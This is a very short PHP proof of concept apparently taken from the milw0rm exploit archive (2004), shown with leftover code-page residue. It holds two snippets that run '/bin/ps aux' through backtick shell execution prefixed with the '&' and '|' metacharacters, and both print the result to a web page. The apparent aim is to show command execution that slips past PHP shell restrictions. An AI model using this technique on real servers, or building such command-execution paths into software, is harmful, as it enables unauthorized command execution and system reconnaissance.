12 lines
153 B
Text
Executable file
12 lines
153 B
Text
Executable file
<?php
|
|
$blah = `& /bin/ps aux`;
|
|
echo nl2br($blah);
|
|
?>
|
|
|
|
<?php
|
|
$blah = `| /bin/ps aux`;
|
|
echo nl2br($blah);
|
|
?>
|
|
|
|
|
|
# milw0rm.com [2004-08-08]
|